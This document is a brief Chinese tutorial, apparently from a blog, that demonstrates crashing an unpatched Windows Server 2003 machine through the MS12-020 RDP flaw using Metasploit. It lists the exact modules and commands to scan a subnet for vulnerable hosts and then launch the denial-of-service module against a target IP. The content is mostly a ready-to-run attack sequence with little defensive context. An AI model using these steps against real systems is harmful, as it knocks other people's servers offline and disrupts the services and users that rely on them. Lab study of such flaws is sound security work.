Metasploit之ms12_020蓝屏攻击演示

渗透测试 metasploit ms12_020 攻击 演示

利用漏洞:MS12-020

官方介绍:http://technet.microsoft.com/en-us/security/bulletin/ms12-020

所需环境:

靶机:Windows Server 2003 SP1未打任何补丁——IP地址:192.168.1.11

攻击机:Windows 10+Metasploit

演示过程:

msf > search ms12_020

搜索结果:

auxiliary/dos/windows/rdp/ms12_020_maxchannelids——进行攻击 
auxiliary/scanner/rdp/ms12_020_check——进行扫描

6631640611257388192.png

【扫描】

1.加载模块

use auxiliary/scanner/rdp/ms12_020_check

2.列出选项

show options

3.设置参数

set RHOSTS 192.168.1.1/24    [扫描IP段范围]

set THREADS 10                     [扫描线程]

4.执行

exploit

6631528461071352814.png

【蓝屏攻击】

1.加载攻击模块

use auxiliary/dos/windows/rdp/ms12_020_maxchannelids

2.列出选项:

show options

RHOST 目标主机:可以放入上面扫描到的192.168.1.11

RPORT 端口默认3389

3.设置参数

set RHOST 192.168.1.11

4.攻击

exploit

6631571342024835277.png

效果:

6631557048373674560.png

新评论

称呼不能为空
邮箱格式不合法
网站格式不合法
内容不能为空